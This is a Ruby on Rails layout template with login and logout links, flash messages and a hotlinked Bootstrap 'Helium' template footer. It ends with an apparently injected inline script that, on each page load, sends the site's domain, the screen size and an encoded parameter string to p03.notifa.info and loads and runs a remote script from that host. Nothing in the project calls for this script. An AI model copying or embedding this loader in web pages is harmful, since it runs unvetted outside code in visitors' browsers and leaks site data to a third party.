<!DOCTYPE html>
<html>
  <head>
    <title>Gambar</title>
    <%= csrf_meta_tags %>
    <%= csp_meta_tag %>

    <%= stylesheet_link_tag    'application', media: 'all', 'data-turbolinks-track': 'reload' %>
    <%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Helium - Bootstrap 4 Onepage Template</title>

    <link rel="stylesheet" type="text/css" href="http://preview.uideck.com/items/helium-1.1/css/bootstrap.min.css">

    <link rel="stylesheet" type="text/css" href="http://preview.uideck.com/items/helium-1.1/css/font-awesome.min.css">

    <link rel="stylesheet" type="text/css" href="http://preview.uideck.com/items/helium-1.1/css/slicknav.css">

    <link rel="stylesheet" type="text/css" href="http://preview.uideck.com/items/helium-1.1/css/owl.carousel.css">
    <link rel="stylesheet" type="text/css" href="http://preview.uideck.com/items/helium-1.1/css/owl.theme.css">

    <link rel="stylesheet" type="text/css" href="http://preview.uideck.com/items/helium-1.1/css/animate.css">

    <link rel="stylesheet" type="text/css" href="http://preview.uideck.com/items/helium-1.1/css/main.css">

    <link rel="stylesheet" type="text/css" href="http://preview.uideck.com/items/helium-1.1/css/extras.css">

    <link rel="stylesheet" type="text/css" href="http://preview.uideck.com/items/helium-1.1/css/responsive.css">
  </head>

  <body>

    <%# ----- add these lines here: ----- %>
  
    <% if current_practice %>
      <!-- current_user will return true if a user is logged in -->
      <%= "Logged in as #{current_practice.email}" %> | <%= link_to 'Home', root_path %> | <%= link_to 'Log Out', logout_path, method: :delete %>
    <% else %>
      <!-- not logged in -->
      <%= link_to 'Home', root_path %> | <%= link_to 'Log In', login_path %> or <%= link_to 'Sign Up', new_user_path %>
    <% end %>
    <hr>
  
    <%# ----- end of added lines ----- %>
    <%# ----- add these lines here: ----- %>
  
  <% if notice %>
            <%= notice %>
  <% end %>
  
  <% if alert %>
            <%= alert %>
  <% end %>
  
  <%# ----- end of added lines ----- %>
    <%= yield %>

    <footer class="footer">

<div class="container">

<div class="row section">

<div class="footer-widget col-lg-3 col-md-6 col-xs-12 wow fadeIn">
<h3 class="small-title">
About Us
</h3>
<p>
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Omnis veritatis eius porro modi hic. Lorem ipsum dolor sit amet, consectetur adipisicing elit.
</p>
<div class="social-footer">
<a href="#"><i class="fa fa-facebook icon-round"></i></a>
<a href="#"><i class="fa fa-twitter icon-round"></i></a>
<a href="#"><i class="fa fa-linkedin icon-round"></i></a>
<a href="#"><i class="fa fa-google-plus icon-round"></i></a>
</div>
</div>


<div class="footer-widget col-lg-3 col-md-6 col-xs-12 wow fadeIn" data-wow-delay=".2s">
<h3 class="small-title">
Links
</h3>
<ul class="menu">
<li><a href="#">About Us</a></li>
<li><a href="#">Services</a></li>
<li><a href="#">Works</a></li>
<li><a href="#">Pricing</a></li>
<li><a href="#">Contact</a></li>
</ul>
</div>


<div class="footer-widget col-lg-3 col-md-6 col-xs-12 wow fadeIn" data-wow-delay=".5s">
<h3 class="small-title">
GALLERY
</h3>
<div class="plain-flicker-gallery">
<a href="#"><img src="img/flicker/img1.jpg" alt=""></a>
<a href="#"><img src="img/flicker/img2.jpg" alt=""></a>
<a href="#"><img src="img/flicker/img3.jpg" alt=""></a>
<a href="#"><img src="img/flicker/img4.jpg" alt=""></a>
<a href="#"><img src="img/flicker/img5.jpg" alt=""></a>
<a href="#"><img src="img/flicker/img6.jpg" alt=""></a>
</div>
</div>


<div class="footer-widget col-lg-3 col-md-6 col-xs-12 wow fadeIn" data-wow-delay=".8s">
<h3 class="small-title">
SUBSCRIBE US
</h3>
<div class="contact-us">
<form>
<div class="form-group">
<input type="text" class="form-control" id="exampleInputName2" placeholder="Enter your name">
</div>
<div class="form-group">
<input type="email" class="form-control" id="exampleInputEmail2" placeholder="Enter your email">
</div>
 <button type="submit" class="btn btn-common">Submit</button>
</form>
</div>
</div>

</div>

</div>


<div id="copyright">
<div class="container">
<div class="row">
<div class="col-lg-6 col-md-6 col-xs-12">
<p class="copyright-text">All copyrights reserved © 2018 - Designed &amp; Developed by <a rel="nofollow" href="https://uideck.com">UIdeck</a>
</p>
</div>
<div class="col-lg-6 col-md-6 col-xs-12">
<ul class="nav nav-inline  justify-content-end ">
<li class="nav-item">
<a class="nav-link active" href="#">Home</a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">Sitemap</a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">Privacy Policy</a>
</li>
<li class="nav-item">
<a class="nav-link" href="#">Terms of services</a>
</li>
</ul>
</div>
</div>
</div>
</div>

</footer>


<a href="#" class="back-to-top">
<i class="fa fa-arrow-up"></i>
</a>

<div id="preloader">
<div class="loader" id="loader-1"></div>
</div>


<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="http://preview.uideck.com/items/helium-1.1/js/jquery-min.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/popper.min.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/bootstrap.min.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/owl.carousel.min.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/jquery.mixitup.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/jquery.countTo.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/jquery.nav.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/scrolling-nav.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/jquery.easing.min.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/jquery.slicknav.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/form-validator.min.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/contact-form-script.js"></script>
<script src="http://preview.uideck.com/items/helium-1.1/js/main.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m3osfWwUB03QCfyaZzBPCUGtuHySYu2HrHb7fXGIJVV95qlcolaQ70d3Q%2faHaWPGF4G%2ba2hdo3O6bhSIWEsJL1IfsXBEqG0y9OivY3vk8IKc30lT0sWUDK6pBo2fPugWtYTxkV8%2bXyMC9ixCRLqgmn3%2b2O5G0UEYCu%2fjIX1Kh9tF34g39YZFgofVMaT2eZwNX0zk5M1cmWOuz%2bH2Ttr5W%2bGM6nU6lVuIm8Ipt8PlAXLpRiX7LpQpiO0nMnw92YvAelQWaWizR2mW1%2bUJJPAi5uqQAPZhBhgJpi%2b8ZRrSnBeOzYhJkerJ5UC2DgD%2bvfmMZeZKG8UmYvkCAb2ackiFhSFOcEE5vJyZAPSKDOmaPJjHjkv5jdvNXenZ1x1F%2bnJD%2fRQUx9XSjagoew2H%2fdcs3M673HrgnChsDP9rwOAtCg7GTWZzhh%2bqGTIoC7pWGWKBGBCqGUWKmauofEiMI7S9pG2MIwoVMZ4qdTP3VA8%2b3vgeu95gEa%2fbUZvgSn1u%2bU5%2bwyhX2SEDTh4%2fahbnsauF9qkltfVMsEcz3JvVwi9MINBgdKninZR8zdQ%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
  </body>
</html>
